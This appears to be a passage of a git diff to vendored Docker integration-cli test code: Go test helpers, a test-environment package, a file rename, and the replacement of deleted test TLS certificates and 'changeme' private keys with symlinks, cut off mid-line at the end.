waitInspectWithArgs(name, expr, expected string, timeout time.Duration, arg ...string) error { + return daemon.WaitInspectWithArgs(dockerBinary, name, expr, expected, timeout, arg...) 
+} + +func getInspectBody(c *check.C, version, id string) []byte { + cli, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion(version)) + c.Assert(err, check.IsNil) + defer cli.Close() + _, body, err := cli.ContainerInspectWithRaw(context.Background(), id, false) + c.Assert(err, check.IsNil) + return body +} + +// Run a long running idle task in a background container using the +// system-specific default image and command. +func runSleepingContainer(c *check.C, extraArgs ...string) string { + return runSleepingContainerInImage(c, defaultSleepImage, extraArgs...) +} + +// Run a long running idle task in a background container using the specified +// image and the system-specific command. +func runSleepingContainerInImage(c *check.C, image string, extraArgs ...string) string { + args := []string{"run", "-d"} + args = append(args, extraArgs...) + args = append(args, image) + args = append(args, sleepCommandForDaemonPlatform()...) + return strings.TrimSpace(cli.DockerCmd(c, args...).Combined()) +} + +// minimalBaseImage returns the name of the minimal base image for the current +// daemon platform. 
+func minimalBaseImage() string { + return testEnv.PlatformDefaults.BaseImage +} + +func getGoroutineNumber() (int, error) { + cli, err := client.NewEnvClient() + if err != nil { + return 0, err + } + defer cli.Close() + + info, err := cli.Info(context.Background()) + if err != nil { + return 0, err + } + return info.NGoroutines, nil +} + +func waitForGoroutines(expected int) error { + t := time.After(30 * time.Second) + for { + select { + case <-t: + n, err := getGoroutineNumber() + if err != nil { + return err + } + if n > expected { + return fmt.Errorf("leaked goroutines: expected less than or equal to %d, got: %d", expected, n) + } + default: + n, err := getGoroutineNumber() + if err != nil { + return err + } + if n <= expected { + return nil + } + time.Sleep(200 * time.Millisecond) + } + } +} + +// getErrorMessage returns the error message from an error API response +func getErrorMessage(c *check.C, body []byte) string { + var resp types.ErrorResponse + c.Assert(json.Unmarshal(body, &resp), check.IsNil) + return strings.TrimSpace(resp.Message) +} + +func waitAndAssert(c *check.C, timeout time.Duration, f checkF, checker check.Checker, args ...interface{}) { + after := time.After(timeout) + for { + v, comment := f(c) + assert, _ := checker.Check(append([]interface{}{v}, args...), checker.Info().Params) + select { + case <-after: + assert = true + default: + } + if assert { + if comment != nil { + args = append(args, comment) + } + c.Assert(v, checker, args...) 
+ return + } + time.Sleep(100 * time.Millisecond) + } +} + +type checkF func(*check.C) (interface{}, check.CommentInterface) +type reducer func(...interface{}) interface{} + +func reducedCheck(r reducer, funcs ...checkF) checkF { + return func(c *check.C) (interface{}, check.CommentInterface) { + var values []interface{} + var comments []string + for _, f := range funcs { + v, comment := f(c) + values = append(values, v) + if comment != nil { + comments = append(comments, comment.CheckCommentString()) + } + } + return r(values...), check.Commentf("%v", strings.Join(comments, ", ")) + } +} + +func sumAsIntegers(vals ...interface{}) interface{} { + var s int + for _, v := range vals { + s += v.(int) + } + return s +} diff --git a/vendor/github.com/docker/docker/integration-cli/environment/environment.go b/vendor/github.com/docker/docker/integration-cli/environment/environment.go new file mode 100644 index 0000000000..82cf99652b --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/environment/environment.go @@ -0,0 +1,49 @@ +package environment // import "github.com/docker/docker/integration-cli/environment" + +import ( + "os" + "os/exec" + + "github.com/docker/docker/internal/test/environment" +) + +var ( + // DefaultClientBinary is the name of the docker binary + DefaultClientBinary = os.Getenv("TEST_CLIENT_BINARY") +) + +func init() { + if DefaultClientBinary == "" { + DefaultClientBinary = "docker" + } +} + +// Execution contains information about the current test execution and daemon +// under test +type Execution struct { + environment.Execution + dockerBinary string +} + +// DockerBinary returns the docker binary for this testing environment +func (e *Execution) DockerBinary() string { + return e.dockerBinary +} + +// New returns details about the testing environment +func New() (*Execution, error) { + env, err := environment.New() + if err != nil { + return nil, err + } + + dockerBinary, err := exec.LookPath(DefaultClientBinary) + if err != nil 
{ + return nil, err + } + + return &Execution{ + Execution: *env, + dockerBinary: dockerBinary, + }, nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/events_utils.go b/vendor/github.com/docker/docker/integration-cli/events_utils_test.go similarity index 98% rename from vendor/github.com/docker/docker/integration-cli/events_utils.go rename to vendor/github.com/docker/docker/integration-cli/events_utils_test.go index ba241796b3..356b2c326d 100644 --- a/vendor/github.com/docker/docker/integration-cli/events_utils.go +++ b/vendor/github.com/docker/docker/integration-cli/events_utils_test.go @@ -9,10 +9,10 @@ import ( "strconv" "strings" - "github.com/Sirupsen/logrus" eventstestutils "github.com/docker/docker/daemon/events/testutils" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "github.com/sirupsen/logrus" ) // eventMatcher is a function that tries to match an event input. @@ -69,7 +69,7 @@ func (e *eventObserver) Start() error { // Stop stops the events command. func (e *eventObserver) Stop() { e.command.Process.Kill() - e.command.Process.Release() + e.command.Wait() } // Match tries to match the events output with a given matcher. 
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures.go b/vendor/github.com/docker/docker/integration-cli/fixtures.go deleted file mode 100644 index e99b738158..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures.go +++ /dev/null @@ -1,69 +0,0 @@ -package main - -import ( - "fmt" - "io/ioutil" - "os" - "os/exec" - "path/filepath" - "sync" -) - -var ensureHTTPServerOnce sync.Once - -func ensureHTTPServerImage() error { - var doIt bool - ensureHTTPServerOnce.Do(func() { - doIt = true - }) - - if !doIt { - return nil - } - - protectedImages["httpserver:latest"] = struct{}{} - - tmp, err := ioutil.TempDir("", "docker-http-server-test") - if err != nil { - return fmt.Errorf("could not build http server: %v", err) - } - defer os.RemoveAll(tmp) - - goos := daemonPlatform - if goos == "" { - goos = "linux" - } - goarch := os.Getenv("DOCKER_ENGINE_GOARCH") - if goarch == "" { - goarch = "amd64" - } - - goCmd, lookErr := exec.LookPath("go") - if lookErr != nil { - return fmt.Errorf("could not build http server: %v", lookErr) - } - - cmd := exec.Command(goCmd, "build", "-o", filepath.Join(tmp, "httpserver"), "github.com/docker/docker/contrib/httpserver") - cmd.Env = append(os.Environ(), []string{ - "CGO_ENABLED=0", - "GOOS=" + goos, - "GOARCH=" + goarch, - }...) 
- var out []byte - if out, err = cmd.CombinedOutput(); err != nil { - return fmt.Errorf("could not build http server: %s", string(out)) - } - - cpCmd, lookErr := exec.LookPath("cp") - if lookErr != nil { - return fmt.Errorf("could not build http server: %v", lookErr) - } - if out, err = exec.Command(cpCmd, "../contrib/httpserver/Dockerfile", filepath.Join(tmp, "Dockerfile")).CombinedOutput(); err != nil { - return fmt.Errorf("could not build http server: %v", string(out)) - } - - if out, err = exec.Command(dockerBinary, "build", "-q", "-t", "httpserver", tmp).CombinedOutput(); err != nil { - return fmt.Errorf("could not build http server: %v", string(out)) - } - return nil -} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test index a7be56b2f2..97b3f1483e 100755 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml deleted file mode 100644 index f30c04f8f1..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml +++ /dev/null @@ -1,9 +0,0 @@ - -version: "3" -services: - web: - image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 - command: top - db: - image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 - command: "tail -f /dev/null" diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml deleted file mode 100644 index 4ec8cacc9b..0000000000 --- 
a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml +++ /dev/null @@ -1,11 +0,0 @@ - -version: "3.1" -services: - web: - image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 - command: top - secrets: - - special -secrets: - special: - file: fixtures/secrets/default diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml deleted file mode 100644 index 6ac92cddee..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml +++ /dev/null @@ -1,20 +0,0 @@ - -version: "3.1" -services: - web: - image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 - command: top - secrets: - - special - - source: super - target: foo.txt - mode: 0400 - - star -secrets: - special: - file: fixtures/secrets/default - super: - file: fixtures/secrets/default - star: - external: - name: outside diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem deleted file mode 100644 index 6825d6d1bd..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem +++ /dev/null @@ -1,23 +0,0 @@ ------BEGIN CERTIFICATE----- -MIID0TCCAzqgAwIBAgIJAP2r7GqEJwSnMA0GCSqGSIb3DQEBBQUAMIGiMQswCQYD -VQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMG -A1UEChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMI -Y2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWls -QGhvc3QuZG9tYWluMB4XDTEzMTIwMzE2NTYzMFoXDTIzMTIwMTE2NTYzMFowgaIx -CzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2Nv -MRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYD -VQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEW -EG1haWxAaG9zdC5kb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALAn 
-0xDw+5y7ZptQacq66pUhRu82JP2WU6IDgo5QUtNU6/CX5PwQATe/OnYTZQFbksxp -AU9boG0FCkgxfsgPYXEuZxVEGKI2fxfKHOZZI8mrkWmj6eWU/0cvCjGVc9rTITP5 -sNQvg+hORyVDdNp2IdsbMJayiB3AQYMFx3vSDOMTAgMBAAGjggELMIIBBzAdBgNV -HQ4EFgQUZu7DFz09q0QBa2+ymRm9qgK1NPswgdcGA1UdIwSBzzCBzIAUZu7DFz09 -q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD -QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x -ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI -Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq -hCcEpzAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAF8fJKKM+/oOdnNi -zEd0M1+PmZOyqvjYQn/2ZR8UHH6Imgc/OPQKZXf0bVE1Txc/DaUNn9Isd1SuCuaE -ic3vAIYYU7PmgeNN6vwec48V96T7jr+GAi6AVMhQEc2hHCfVtx11Xx+x6aHDZzJt -Zxtf5lL6KSO9Y+EFwM+rju6hm5hW ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem new file mode 120000 index 0000000000..70a3e6ce54 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem @@ -0,0 +1 @@ +../../../integration/testdata/https/ca.pem \ No newline at end of file diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem deleted file mode 100644 index c05ed47c2c..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem +++ /dev/null @@ -1,73 +0,0 @@ -Certificate: - Data: - Version: 3 (0x2) - Serial Number: 3 (0x3) - Signature Algorithm: sha1WithRSAEncryption - Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain - Validity - Not Before: Dec 4 14:17:54 2013 GMT - Not After : Dec 2 14:17:54 2023 GMT - Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain - Subject Public Key Info: - Public Key 
Algorithm: rsaEncryption - Public-Key: (1024 bit) - Modulus: - 00:ca:c9:05:d0:09:4e:3e:a4:fc:d5:14:f4:a5:e8: - 34:d3:6b:51:e3:f3:62:ea:a1:f0:e8:ed:c4:2a:bc: - f0:4f:ca:07:df:e3:88:fa:f4:21:99:35:0e:3d:ea: - b0:86:e7:c4:d2:8a:83:2b:42:b8:ec:a3:99:62:70: - 81:46:cc:fc:a5:1d:d2:63:e8:eb:07:25:9a:e2:25: - 6d:11:56:f2:1a:51:a1:b6:3e:1c:57:32:e9:7b:2c: - aa:1b:cc:97:2d:89:2d:b1:c9:5e:35:28:4d:7c:fa: - 65:31:3e:f7:70:dd:6e:0b:3c:58:af:a8:2e:24:c0: - 7e:4e:78:7d:0a:9e:8f:42:43 - Exponent: 65537 (0x10001) - X509v3 extensions: - X509v3 Basic Constraints: - CA:FALSE - Netscape Comment: - Easy-RSA Generated Certificate - X509v3 Subject Key Identifier: - DE:42:EF:2D:98:A3:6C:A8:AA:E0:8C:71:2C:9D:64:23:A9:E2:7E:81 - X509v3 Authority Key Identifier: - keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB - DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain - serial:FD:AB:EC:6A:84:27:04:A7 - - X509v3 Extended Key Usage: - TLS Web Client Authentication - X509v3 Key Usage: - Digital Signature - Signature Algorithm: sha1WithRSAEncryption - 1c:44:26:ea:e1:66:25:cb:e4:8e:57:1c:f6:b9:17:22:62:40: - 12:90:8f:3b:b2:61:7a:54:94:8f:b1:20:0b:bf:a3:51:e3:fa: - 1c:a1:be:92:3a:d0:76:44:c0:57:83:ab:6a:e4:1a:45:49:a4: - af:39:0d:60:32:fc:3a:be:d7:fb:5d:99:7a:1f:87:e7:d5:ab: - 84:a2:5e:90:d8:bf:fa:89:6d:32:26:02:5e:31:35:68:7f:31: - f5:6b:51:46:bc:af:70:ed:5a:09:7d:ec:b2:48:4f:fe:c5:2f: - 56:04:ad:f6:c1:d2:2a:e4:6a:c4:87:fe:08:35:c5:38:cb:5e: - 4a:c4 ------BEGIN CERTIFICATE----- -MIIEFTCCA36gAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx -CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv -cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l -MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv -bWFpbjAeFw0xMzEyMDQxNDE3NTRaFw0yMzEyMDIxNDE3NTRaMIGgMQswCQYDVQQG -EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE 
-ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEPMA0GA1UEAxMGY2xp -ZW50MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0 -LmRvbWFpbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAyskF0AlOPqT81RT0 -peg002tR4/Ni6qHw6O3EKrzwT8oH3+OI+vQhmTUOPeqwhufE0oqDK0K47KOZYnCB -Rsz8pR3SY+jrByWa4iVtEVbyGlGhtj4cVzLpeyyqG8yXLYktscleNShNfPplMT73 -cN1uCzxYr6guJMB+Tnh9Cp6PQkMCAwEAAaOCAVkwggFVMAkGA1UdEwQCMAAwLQYJ -YIZIAYb4QgENBCAWHkVhc3ktUlNBIEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTAdBgNV -HQ4EFgQU3kLvLZijbKiq4IxxLJ1kI6nifoEwgdcGA1UdIwSBzzCBzIAUZu7DFz09 -q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD -QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x -ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI -Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq -hCcEpzATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNVHQ8EBAMCB4AwDQYJKoZIhvcN -AQEFBQADgYEAHEQm6uFmJcvkjlcc9rkXImJAEpCPO7JhelSUj7EgC7+jUeP6HKG+ -kjrQdkTAV4OrauQaRUmkrzkNYDL8Or7X+12Zeh+H59WrhKJekNi/+oltMiYCXjE1 -aH8x9WtRRryvcO1aCX3sskhP/sUvVgSt9sHSKuRqxIf+CDXFOMteSsQ= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem new file mode 120000 index 0000000000..458882026e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem @@ -0,0 +1 @@ +../../../integration/testdata/https/client-cert.pem \ No newline at end of file diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem deleted file mode 100644 index b5c15f8dc7..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem +++ /dev/null @@ -1,16 +0,0 @@ ------BEGIN PRIVATE KEY----- -MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMrJBdAJTj6k/NUU -9KXoNNNrUePzYuqh8OjtxCq88E/KB9/jiPr0IZk1Dj3qsIbnxNKKgytCuOyjmWJw 
-gUbM/KUd0mPo6wclmuIlbRFW8hpRobY+HFcy6XssqhvMly2JLbHJXjUoTXz6ZTE+ -93Ddbgs8WK+oLiTAfk54fQqej0JDAgMBAAECgYBOFEzKp2qbMEexe9ofL2N3rDDh -xkrl8OijpzkLA6i78BxMFn4dsnZlWUpciMrjhsYAExkiRRSS+QMMJimAq1jzQqc3 -FAQV2XGYwkd0cUn7iZGvfNnEPysjsfyYQM+m+sT0ATj4BZjVShC6kkSjTdm1leLN -OSvcHdcu3Xxg9ufF0QJBAPYdnNt5sIndt2WECePuRVi+uF4mlxTobFY0fjn26yhC -4RsnhhD3Vldygo9gvnkwrAZYaALGSPBewes2InxvjA8CQQDS7erKiNXpwoqz5XiU -SVEsIIVTdWzBjGbIqMOu/hUwM5FK4j6JTBks0aTGMyh0YV9L1EzM0X79J29JahCe -iQKNAkBKNMOGqTpBV0hko1sYDk96YobUXG5RL4L6uvkUIQ7mJMQam+AgXXL7Ctuy -v0iu4a38e8tgisiTMP7nHHtpaXihAkAOiN54/lzfMsykANgCP9scE1GcoqbP34Dl -qttxH4kOPT9xzY1JoLjLYdbc4YGUI3GRpBt2sajygNkmUey7P+2xAkBBsVCZFvTw -qHvOpPS2kX5ml5xoc/QAHK9N7kR+X7XFYx82RTVSqJEK4lPb+aEWn+CjiIewO4Q5 -ksDFuNxAzbhl ------END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem new file mode 120000 index 0000000000..d5f6bbee57 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem @@ -0,0 +1 @@ +../../../integration/testdata/https/client-key.pem \ No newline at end of file diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem deleted file mode 100644 index 08abfd1a3b..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem +++ /dev/null @@ -1,76 +0,0 @@ -Certificate: - Data: - Version: 3 (0x2) - Serial Number: 4 (0x4) - Signature Algorithm: sha1WithRSAEncryption - Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain - Validity - Not Before: Dec 4 15:01:20 2013 GMT - Not After : Dec 2 15:01:20 2023 GMT - Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=*/name=changeme/emailAddress=mail@host.domain - Subject Public Key Info: - Public 
Key Algorithm: rsaEncryption - Public-Key: (1024 bit) - Modulus: - 00:c1:ff:7d:30:6f:64:4a:b1:92:b1:71:d1:c1:74: - e2:1d:db:2d:11:24:e1:00:d4:00:ae:6f:c8:9e:ae: - 67:b3:4a:bd:f7:e6:9e:57:6d:19:4c:3c:23:94:2d: - 3d:d6:63:84:d8:fa:76:2b:38:12:c1:ed:20:9d:32: - e0:e8:c2:bf:9a:77:70:04:3f:7f:ca:8c:2c:82:d6: - 3d:25:5c:02:1a:4f:64:93:03:dd:9c:42:97:5e:09: - 49:af:f0:c2:e1:30:08:0e:21:46:95:d1:13:59:c0: - c8:76:be:94:0d:8b:43:67:21:33:b2:08:60:9d:76: - a8:05:32:1e:f9:95:09:14:75 - Exponent: 65537 (0x10001) - X509v3 extensions: - X509v3 Basic Constraints: - CA:FALSE - Netscape Cert Type: - SSL Server - Netscape Comment: - Easy-RSA Generated Server Certificate - X509v3 Subject Key Identifier: - 14:02:FD:FD:DD:13:38:E0:71:EA:D1:BE:C0:0E:89:1A:2D:B6:19:06 - X509v3 Authority Key Identifier: - keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB - DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain - serial:FD:AB:EC:6A:84:27:04:A7 - - X509v3 Extended Key Usage: - TLS Web Server Authentication - X509v3 Key Usage: - Digital Signature, Key Encipherment - Signature Algorithm: sha1WithRSAEncryption - 40:0f:10:39:c4:b7:0f:0d:2f:bf:d2:16:cc:8e:d3:9a:fb:8b: - ce:4b:7b:0d:48:77:ce:f1:fe:d5:8f:ea:b1:71:ed:49:1d:9f: - 23:3a:16:d4:70:7c:c5:29:bf:e4:90:34:d0:f0:00:24:f4:e4: - df:2c:c3:83:01:66:61:c9:a8:ab:29:e7:98:6d:27:89:4a:76: - c9:2e:19:8e:fe:6e:d5:f8:99:11:0e:97:67:4b:34:e3:1e:e3: - 9f:35:00:a5:32:f9:b5:2c:f2:e0:c5:2e:cc:81:bd:18:dd:5c: - 12:c8:6b:fa:0c:17:74:30:55:f6:6e:20:9a:6c:1e:09:b4:0c: - 15:42 ------BEGIN CERTIFICATE----- -MIIEKjCCA5OgAwIBAgIBBDANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx -CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv -cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l -MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv -bWFpbjAeFw0xMzEyMDQxNTAxMjBaFw0yMzEyMDIxNTAxMjBaMIGbMQswCQYDVQQG 
-EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE -ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEKMAgGA1UEAxQBKjER -MA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21h -aW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMH/fTBvZEqxkrFx0cF04h3b -LREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y4OjCv5p3 -cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+lA2LQ2ch -M7IIYJ12qAUyHvmVCRR1AgMBAAGjggFzMIIBbzAJBgNVHRMEAjAAMBEGCWCGSAGG -+EIBAQQEAwIGQDA0BglghkgBhvhCAQ0EJxYlRWFzeS1SU0EgR2VuZXJhdGVkIFNl -cnZlciBDZXJ0aWZpY2F0ZTAdBgNVHQ4EFgQUFAL9/d0TOOBx6tG+wA6JGi22GQYw -gdcGA1UdIwSBzzCBzIAUZu7DFz09q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJ -BgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUw -EwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD -EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h -aWxAaG9zdC5kb21haW6CCQD9q+xqhCcEpzATBgNVHSUEDDAKBggrBgEFBQcDATAL -BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEAQA8QOcS3Dw0vv9IWzI7TmvuL -zkt7DUh3zvH+1Y/qsXHtSR2fIzoW1HB8xSm/5JA00PAAJPTk3yzDgwFmYcmoqynn -mG0niUp2yS4Zjv5u1fiZEQ6XZ0s04x7jnzUApTL5tSzy4MUuzIG9GN1cEshr+gwX -dDBV9m4gmmweCbQMFUI= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem new file mode 120000 index 0000000000..c18601067a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem @@ -0,0 +1 @@ +../../../integration/testdata/https/server-cert.pem \ No newline at end of file diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem deleted file mode 100644 index c269320ef0..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem +++ /dev/null @@ -1,16 +0,0 @@ ------BEGIN PRIVATE KEY----- 
-MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAMH/fTBvZEqxkrFx -0cF04h3bLREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y -4OjCv5p3cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+ -lA2LQ2chM7IIYJ12qAUyHvmVCRR1AgMBAAECgYAmwckb9RUfSwyYgLm8IYLPHiuJ -wkllZfVg5Bo7gXJcQnFjZmJ56uTj8xvUjZlODIHM63TSO5ibv6kFXtXKCqZGd2M+ -wGbhZ0f+2GvKcwMmJERnIQjuoNaYSQLT0tM0VB9Iz0rJlZC+tzPZ+5pPqEumRdsS -IzWNXfF42AhcbwAQYQJBAPVXtMYIJc9EZsz86ZcQiMPWUpCX5vnRmtwL8kKyR8D5 -4KfYeiowyFffSRMMcclwNHq7TgSXN+nIXM9WyzyzwikCQQDKbNA28AgZp9aT54HP -WnbeE2pmt+uk/zl/BtxJSoK6H+69Jec+lf7EgL7HgOWYRSNot4uQWu8IhsHLTiUq -+0FtAkEAqwlRxRy4/x24bP+D+QRV0/D97j93joFJbE4Hved7jlSlAV4xDGilwlyv -HNB4Iu5OJ6Gcaibhm+FKkmD3noHSwQJBAIpu3fokLzX0bS+bDFBU6qO3HXX/47xj -+tsfQvkwZrSI8AkU6c8IX0HdVhsz0FBRQAT2ORDQz1XCarfxykNZrwUCQQCGCBIc -BBCWzhHlswlGidWJg3HqqO6hPPClEr3B5G87oCsdeYwiO23XT6rUnoJXfJHp6oCW -5nCwDu5ZTP+khltg ------END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem new file mode 120000 index 0000000000..48b9c2df65 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem @@ -0,0 +1 @@ +../../../integration/testdata/https/server-key.pem \ No newline at end of file diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt deleted 